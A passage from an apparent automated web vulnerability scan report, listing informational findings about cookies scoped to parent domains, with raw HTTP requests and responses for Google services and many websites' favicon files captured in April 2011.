Host: maps.google.com
Proxy-Connection: keep-alive
Referer: http://www.kcom.com/contact-us/brighton
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NID=45=MN9SWdYxMCQkHpb_d4WQmZ3kNpxn-MU9rpOlJhbEI5Fv3qxoLHavXA9mGpZlvSgRwUfbeSkks_uJwt-RCh2wY4zw_ar14vIG6SnN2YqoOVhzrCC_k--3E7er-ItNIIG8; PREF=ID=4c7d4f16a5b7a597:U=7fbf22d2ab32053a:FF=4:LD=en:CR=2:TM=1300551593:LM=1301752649:GM=1:IG=3:SG=1:S=d5391Or4mtSSJS9x

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:57:31 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/javascript; charset=UTF-8
Set-Cookie: PREF=ID=4c7d4f16a5b7a597:U=7fbf22d2ab32053a:FF=4:LD=en:CR=2:TM=1300551593:LM=1301752651:GM=1:IG=3:SG=1:S=mnR2BkyBhZFvD7WE; expires=Mon, 01-Apr-2013 13:57:31 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: mfe
X-XSS-Protection: 1; mode=block
Content-Length: 1332

GAddCopyright("m","11605834097857221387",50.7983,-0.1959,50.8471,-0.0929,13,"Tele Atlas",19,false);
window.GAppFeatures && window.GAppFeatures({cb:{bounds:[{s:50889174,w:-285645,n:50903033,e:-153809,i
...[SNIP]...
13.16. http://safebrowsing.clients.google.com/safebrowsing/downloads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://safebrowsing.clients.google.com
Path:   /safebrowsing/downloads

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

POST /safebrowsing/downloads?client=googlechrome&appver=10.0.648.204&pver=2.2&wrkey=AKEgNiu2mFE63FMw496NljDbfuqWVUHfR5aspR9G78SPoDGBnjDblFO5_v3By_lHgdefi2qYWL0qQkqRPEgqQcEZbPgzqr3RaA== HTTP/1.1
Host: safebrowsing.clients.google.com
Proxy-Connection: keep-alive
Content-Type: text/plain
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NID=45=MN9SWdYxMCQkHpb_d4WQmZ3kNpxn-MU9rpOlJhbEI5Fv3qxoLHavXA9mGpZlvSgRwUfbeSkks_uJwt-RCh2wY4zw_ar14vIG6SnN2YqoOVhzrCC_k--3E7er-ItNIIG8; PREF=ID=4c7d4f16a5b7a597:U=7fbf22d2ab32053a:FF=4:LD=en:CR=2:TM=1300551593:LM=1301746656:GM=1:IG=3:SG=1:S=-7aZMRhsTdHlesaT
Content-Length: 104

goog-malware-shavar;a:28068-35165:s:40805-47673:mac
goog-phish-shavar;a:130630-134965:s:67129-68856:mac

Response

HTTP/1.1 200 OK
Content-Type: application/vnd.google.safebrowsing-update
Set-Cookie: PREF=ID=4c7d4f16a5b7a597:U=7fbf22d2ab32053a:FF=4:LD=en:CR=2:TM=1300551593:LM=1301748493:GM=1:IG=3:SG=1:S=dU5RHSbYxFO9H3Ys; expires=Mon, 01-Apr-2013 12:48:13 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Date: Sat, 02 Apr 2011 12:48:13 GMT
Server: Chunked Update Server
Content-Length: 369
X-XSS-Protection: 1; mode=block
Expires: Sat, 02 Apr 2011 12:48:13 GMT
Cache-Control: private

m:sDWcvq3SwCNj5QAXb_7v9pezsYg=
n:1772
i:goog-malware-shavar
i:goog-phish-shavar
ad:130630-130632
u:safebrowsing-cache.google.com/safebrowsing/rd/ChFnb29nLXBoaXNoLXNoYXZhchABGPiZBCD8mQQqBfoMAQAHMgX4DAE
...[SNIP]...
13.17. http://translate.google.com/translate_a/element.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://translate.google.com
Path:   /translate_a/element.js

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /translate_a/element.js?cb=cr.googleTranslate.onTranslateElementLoad HTTP/1.1
Host: translate.google.com
Proxy-Connection: keep-alive
Google-Translate-Element-Mode: library
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: NID=45=MN9SWdYxMCQkHpb_d4WQmZ3kNpxn-MU9rpOlJhbEI5Fv3qxoLHavXA9mGpZlvSgRwUfbeSkks_uJwt-RCh2wY4zw_ar14vIG6SnN2YqoOVhzrCC_k--3E7er-ItNIIG8; PREF=ID=4c7d4f16a5b7a597:U=7fbf22d2ab32053a:FF=4:LD=en:CR=2:TM=1300551593:LM=1301748493:GM=1:IG=3:SG=1:S=dU5RHSbYxFO9H3Ys

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 12:48:39 GMT
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Cache-Control: no-cache, must-revalidate
Content-Type: text/javascript; charset=UTF-8
Content-Language: en
Pragma: no-cache
Set-Cookie: PREF=ID=4c7d4f16a5b7a597:U=7fbf22d2ab32053a:FF=4:LD=en:CR=2:TM=1300551593:LM=1301748519:GM=1:IG=3:SG=1:S=BBZNQWKju3cJJqSO; expires=Mon, 01-Apr-2013 12:48:39 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: translation
X-XSS-Protection: 1; mode=block
Content-Length: 1422

(function(){var d=window,e=document;function f(b){var a=e.getElementsByTagName("head")[0];a||(a=e.body.parentNode.appendChild(e.createElement("head")));a.appendChild(b)}function _loadJs(b){var a=e.cre
...[SNIP]...
13.18. http://www.411.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.411.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.411.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Vary: Accept-Encoding
Cache-Control: private, max-age=0, must-revalidate
Content-Type: text/html; charset=utf-8
Date: Sat, 02 Apr 2011 13:42:01 GMT
Status: 200 OK
X-Runtime: 0.02831
ETag: "28868ff376e29e9093907243f62f8121"
Connection: keep-alive
Set-Cookie: wp_endemic_provider=A; domain=.411.com; path=/; expires=Sun, 03 Apr 2011 01:42:01 GMT
Set-Cookie: wp_perm=pid%3D_LLdoF0uEeCxcgAeC-lzfg; domain=.411.com; path=/; expires=Sun, 01 Apr 2012 13:42:01 GMT
Set-Cookie: wp_qc_demo_at=gn%3D%2Cage%3D%2Cchh%3D%2Cedu%3D%2Chh%3D%2Cqn%3D; domain=.411.com; path=/; expires=Sun, 01 Apr 2012 13:42:01 GMT
Set-Cookie: _wpn_sid=7494deac6a51f7c62e310ec573d0b582; domain=.411.com; path=/
Content-Length: 16254

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<meta http-equi
...[SNIP]...
13.19. http://www.addresses.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.addresses.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.addresses.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:34:10 GMT
Server: Apache
Expires: Sat, 16 Apr 2011 06:34:10 GMT
Cache-Control: public
ETag: 3df0322508f321b7cd4e730f2fa1acacb8eb1d38
Content-Type: image/x-icon
Set-Cookie: BIGipServerp-directory=922927882.20480.0000;domain=addresses.com; expires=Sat, 02-Apr-2011 15:04:10 GMT; path=/
Content-Length: 2238

...... ..............(... ...@.......................................................!..."...$...&...'...(...*...+...,......./...1...2...3...3...3...5...6...7...6...8...9...:...:...<...?...<...?...@.
...[SNIP]...
13.20. http://www.advanceautoparts.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.advanceautoparts.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.advanceautoparts.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: IBM_HTTP_Server
Last-Modified: Mon, 16 Aug 2010 19:49:41 GMT
ETag: "536ae-47e-48df622227f40"-gzip
P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAo IVDo CONo TELo OUR IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA PRE LOC"
Content-Type: image/x-icon
Cache-Control: max-age=3600
Expires: Sat, 02 Apr 2011 14:53:19 GMT
Date: Sat, 02 Apr 2011 13:53:19 GMT
Content-Length: 1150
Connection: close
Set-Cookie: Region=DC; path=/; domain=.advanceautoparts.com
Set-Cookie: City=WASHINGTON; path=/; domain=.advanceautoparts.com
Set-Cookie: Areacode=202+703+301; path=/; domain=.advanceautoparts.com
Set-Cookie: Zip=20001-20020+20024+20026+20029-20082+20088-20091+20097-20099+20201-20245+20250-20251+20254+20260-20262+20265-20270+20277+20289+20299+20301+20303+20306-20307+20310+20314-20319+20330+20332+20336-20340+20350+20370+20372-20376+20380+20388-20395+20398+20401-20429+20431+20433-20444+20447+20451+20453+20456+20460+20463+20468-20472+20500-20510+20515+20520-20527+20530-20560+20565-20566+20570-20581+20585-20586+20590-20599; path=/; domain=.advanceautoparts.com

............ .h.......(....... ..... ....................................................................................................................
.......................................M}r....
...[SNIP]...
13.21. http://www.alibaba.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.alibaba.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.alibaba.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:31:24 GMT
Server: Apache/2.2.15 (Unix) mod_AliCookie(for apache2.x)/1.1 Beacon/3.2 mod_jk/1.2.28
Set-Cookie: ali_apache_id=173.193.214.243.64460051084706.7; path=/; domain=.alibaba.com; expires=Wed, 30-Nov-2084 01:01:01 GMT
Set-Cookie: ali_apache_sid=173.193.214.243.64460051084706.7|1301752884; path=/; domain=.alibaba.com
Last-Modified: Wed, 29 Dec 2010 15:54:08 GMT
ETag: "dc008-57e-4988e9451a800"
Accept-Ranges: bytes
Content-Length: 1406
Vary: Accept-Encoding,User-Agent
Content-Type: text/plain

..............h.......(....... ...........@............................p...LL......t.......(H.0P......,Hx. XX.....4h.. 0@.0`...|...,,.........8x......0@X..00.. 0..............\\......|.......<D.<\..D`
...[SNIP]...
13.22. http://www.americanexpress.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.americanexpress.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.americanexpress.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:33:34 GMT
Server: IBM_HTTP_Server
Set-Cookie: SaneID=173.193.214.243-1301751214570006; path=/; expires=Tue, 05-Apr-16 13:33:34 GMT; domain=.americanexpress.com
Last-Modified: Wed, 21 Oct 2009 07:07:44 GMT
Accept-Ranges: bytes
Content-Length: 894
Cache-Control: max-age=1
Expires: Sat, 02 Apr 2011 13:33:35 GMT
Content-Type: image/x-icon

..............h.......(....... ................................_..}..~..~..}..|..z..z..w..x..u..t..r..p..p..q..i...............................~..}..z..x..x..o......................................|.
...[SNIP]...
13.23. http://www.apartments.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.apartments.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.apartments.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Content-Length: 318
Content-Type: image/x-icon
Last-Modified: Thu, 10 Mar 2005 19:16:51 GMT
Accept-Ranges: bytes
ETag: "eef59cb6a525c51:0"
Server: Microsoft-IIS/7.5
Set-Cookie: userSite=Active|True@TotalNumberOfUsers|100@NumberOfBetaUsers|0@UserSiteType|Apt@BaseURL|www@SiteId|1@BetaNumber|169@RedirectURL|http://www.apartments.com@; domain=.apartments.com; expires=Sat, 02-Mar-2013 14:45:17 GMT; path=/
Set-Cookie: activitylogging=expirationday=3/31/2016 8:45:17 AM&lastactivitytime=4/2/2011 8:45:17 AM&visitid=22aa4494-a1e4-4ad2-a264-1d3adfed4348&visitorid=d943f403-d2ad-491a-ad99-f9674d3c3681&lastfrontdoor=APTS; expires=Thu, 31-Mar-2016 13:45:17 GMT; path=/
Set-Cookie: AptAff=e2277821e6304b3afb4cea5f8f0c0654980fee5bfc0e3c990502f3aacef349fa;Path=/
Set-Cookie: userSite=Active|True@TotalNumberOfUsers|100@NumberOfBetaUsers|0@UserSiteType|Apt@BaseURL|www@SiteId|1@BetaNumber|169@RedirectURL|http://www.apartments.com@; domain=.apartments.com; expires=Sat, 02-Mar-2013 14:45:17 GMT; path=/
Set-Cookie: activitylogging=expirationday=3/31/2016 8:45:17 AM&lastactivitytime=4/2/2011 8:45:17 AM&visitid=22aa4494-a1e4-4ad2-a264-1d3adfed4348&visitorid=d943f403-d2ad-491a-ad99-f9674d3c3681&lastfrontdoor=APTS; expires=Thu, 31-Mar-2016 13:45:17 GMT; path=/
X-Powered-By: ASP.NET
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:45:16 GMT
Set-Cookie: aptspersistence=578884780.24576.0000; path=/

..............(.......(....... ..................................."...b..........................................................................0........#....!.................31...1. .....1.0.....1.
...[SNIP]...
13.24. http://www.automotive.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.automotive.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.automotive.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:40:51 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=kc4mq245jn1lcx55hwsqsuze; path=/; HttpOnly
Set-Cookie: UserPuid=2324458499622796901; domain=automotive.com; expires=Sat, 02-Apr-2061 13:40:51 GMT; path=/
Cache-Control: private
Content-Type: image/x-icon
Content-Length: 426

GIF89a..............bf.....    .gj..........DH....15.BF........................................!&................il..........VZ.............,0....~.........$.JN.y|.......7;.@D.8<...................
..
...[SNIP]...
13.25. http://www.autotrader.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autotrader.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.autotrader.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:25:47 GMT
Server: Apache
Set-Cookie: v1st=25A5F04B12A8896B; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.autotrader.com
Set-Cookie: ATC_ID=173.193.214.243.1301750747268522; path=/; expires=Thu, 12-Mar-15 13:25:47 GMT; domain=.autotrader.com
Last-Modified: Tue, 15 Mar 2011 18:14:33 GMT
Accept-Ranges: bytes
Content-Length: 318
P3P: CP="NOI DSP COR DEVa TAIa OUR BUS UNI"
Content-Type: image/vnd.microsoft.icon
Set-Cookie: BIGipServerAT-Production_hhtp=209020426.61475.0000; path=/

..............(.......(....... ..................................................................................................TE.....DDDD...TDDDDE....E.......DI..@...D@..LT@..
..EDD.....DDDZ.@.TDTD
...[SNIP]...
13.26. http://www.baidu.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.baidu.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.baidu.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:56:08 GMT
Server: Apache
P3P: CP=" OTI DSP COR IVA OUR IND COM "
Set-Cookie: BAIDUID=732DA6B3A161553654A9C343A4882D17:FG=1; expires=Sun, 01-Apr-12 13:56:08 GMT; max-age=31536000; path=/; domain=.baidu.com; version=1
Last-Modified: Mon, 24 Jan 2011 11:52:05 GMT
ETag: "13e-49a963a8e0340"
Accept-Ranges: bytes
Content-Length: 318
Vary: Accept-Encoding,User-Agent
Connection: Keep-Alive
Content-Type: image/x-icon

..............(.......(....... ...................................................................................................................|.....................................................
...[SNIP]...
13.27. http://www.bidcactus.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bidcactus.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bidcactus.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:17:39 GMT
Server: Apache
Last-Modified: Fri, 01 Apr 2011 16:25:10 GMT
ETag: "7d40c4-47e-49fddda8b6580"
Accept-Ranges: bytes
Content-Length: 1150
Content-Type: image/x-icon
Set-Cookie: BALANCEID=balancer.www13; path=/; domain=.bidcactus.com
Via: 1.1 bidcactus.com

............ .h.......(....... ..... ...................................................................................................................................................................
...[SNIP]...
13.28. http://www.bizjournals.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.bizjournals.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.bizjournals.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 404 Not Found
Date: Sat, 02 Apr 2011 13:39:04 GMT
Server: Apache
Set-Cookie: bizj=YToxOntzOjM6IlVJTiI7czozMDoiMjkxNTE2MTg0MzRkOTcyNmY4Y2Y3Njg3MGZlZjhjIjt9%7C1301751544%7C6cb798d646d7838561076324272978f8ff136b64cfb9b8dd5c0d4c55c0436ed1; expires=Sun, 01-Apr-2012 13:39:04 GMT; path=/; domain=.bizjournals.com
Set-Cookie: bizj=YToxOntzOjM6IlVJTiI7czozMDoiMjkxNTE2MTg0MzRkOTcyNmY4ZDBiNThjNWNlMGIzIjt9%7C1301751544%7Cb769a95f8358eec5ae178a6877548f04d46f0bba7d768b809293bbbf75c88a93; expires=Sun, 01-Apr-2012 13:39:04 GMT; path=/; domain=.bizjournals.com
ServerID: 3
Vary: Accept-Encoding
Content-Type: text/html
Content-Length: 45605

<!DOCTYPE html>
<!-- tid: 105; lct: Wed Mar 23 15:40:16 2011 -->
<!--[if IE ]><![endif]-->
<html>
<head><title>The page you requested was not found | The Business Journals</title>
<base href="http://w
...[SNIP]...
13.29. http://www.buzznet.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.buzznet.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.buzznet.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:44:25 GMT
Server: Apache
Set-Cookie: bncom=173.193.214.243.71371301751865415; path=/; domain=.buzznet.com
Last-Modified: Thu, 30 Sep 2010 19:44:38 GMT
ETag: "47e-4ca4e8a6"
Accept-Ranges: bytes
Content-Length: 1150
Connection: close
Content-Type: image/x-icon

............ .h.......(....... ..... .............................................................................................................. ...................................................
...[SNIP]...
13.30. http://www.cisco.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cisco.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cisco.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Server: Apache/2.0
Last-Modified: Tue, 10 Jun 2008 19:13:16 GMT
ETag: "b8602b00"
Accept-Ranges: bytes
Content-Length: 1150
Cache-Control: max-age=0
Expires: Sat, 02 Apr 2011 13:39:19 GMT
CDCHOST: ccows-sj-201
Content-Type: image/x-icon
Date: Sat, 02 Apr 2011 13:39:19 GMT
Connection: close
Set-Cookie: CP_GUTC=72.163.4.165.1301751559889702; path=/; expires=Wed, 26-Mar-36 13:39:19 GMT; domain=.cisco.com

............ .h.......(....... ..... ...................................................................................................................................................................
...[SNIP]...
13.31. http://www.collegehumor.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.collegehumor.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.collegehumor.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.0 404 Not Found
Date: Sat, 02 Apr 2011 13:35:37 GMT
Server: Apache
X-Powered-By: PHP/5.3.6
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Set-Cookie: returning_user=deleted; expires=Fri, 02-Apr-2010 13:35:36 GMT; path=/; domain=.collegehumor.com
Set-Cookie: returning_user=1; expires=Mon, 02-May-2011 13:35:37 GMT; path=/; domain=.collegehumor.com
Set-Cookie: jument_hash=deleted; expires=Fri, 02-Apr-2010 13:35:36 GMT; path=/; domain=.collegehumor.com
Set-Cookie: jument_hash=2aaaf6d3dd05b89fe9a91fb542a542bf37833c97; expires=Fri, 01-Apr-2016 18:39:27 GMT; path=/; domain=.collegehumor.com
Set-Cookie: jument_hash=2aaaf6d3dd05b89fe9a91fb542a542bf37833c97; expires=Fri, 01-Apr-2016 18:39:27 GMT; path=/; domain=.collegehumor.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Pragma: no-cache
Vary: Accept-Encoding
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en" xmlns:fb="http://www.fa
...[SNIP]...
13.32. http://www.cornell.edu/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.cornell.edu
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.cornell.edu
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:51:19 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/0.9.8l JRun/4.0
Last-Modified: Wed, 15 Sep 2010 19:11:24 GMT
ETag: "2da6bb-47e-49051187a3db1"
Accept-Ranges: bytes
Content-Length: 1150
Content-Type: image/x-icon
Set-Cookie: BALANCEID=balancer.cf068; path=/; domain=.cornell.edu

............ .h.......(....... ..... .............................................rr..88..........88..rr..................................ss..FF..........................FF..ss......................\\
...[SNIP]...
13.33. http://www.directv.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.directv.com
Path:   /favicon.ico

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.directv.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Cache-Control: max-age=900
Content-Length: 1150
Content-Type: image/x-icon
Last-Modified: Wed, 21 Nov 2007 16:56:17 GMT
Accept-Ranges: bytes
ETag: "80cea66e5f2cc81:7d9"
Server: Microsoft-IIS/6.0
Set-Cookie: TLTHID=DD21B83B4FE66273AF7ED4AC3335D73E; Path=/; Domain=.directv.com
Set-Cookie: TLTSID=DD21B83B4FE66273AF7ED4AC3335D73E; Path=/; Domain=.directv.com
Date: Sat, 02 Apr 2011 13:26:09 GMT

............ .h.......(....... ..... ............................................................................................................................................................3......
...[SNIP]...
13.34. http://www.discovercard.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.discovercard.com
Path:   /favicon.ico

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /favicon.ico HTTP/1.1
User-Agent: curl/7.21.0 (amd64-pc-win32) libcurl/7.21.0 OpenSSL/0.9.8o zlib/1.2.3
Host: www.discovercard.com
Accept: */*
Proxy-Connection: Keep-Alive

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:39:21 GMT
Server: Apache
Set-Cookie: v1st=D8BCADAE8D52A0E9; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.discovercard.com
Last-Modified: Thu, 26 Jun 2008 22:04:17 GMT
Accept-Ranges: bytes
Content-Length: 0
Vary: Accept-Encoding,User-Agent
P3P: CP="CAO DSP COR ADM DEV TAI PSA PSD IVA IVD CONo TELo OTP OUR DEL SAMo IND NAV"
Content-Type: image/x-icon

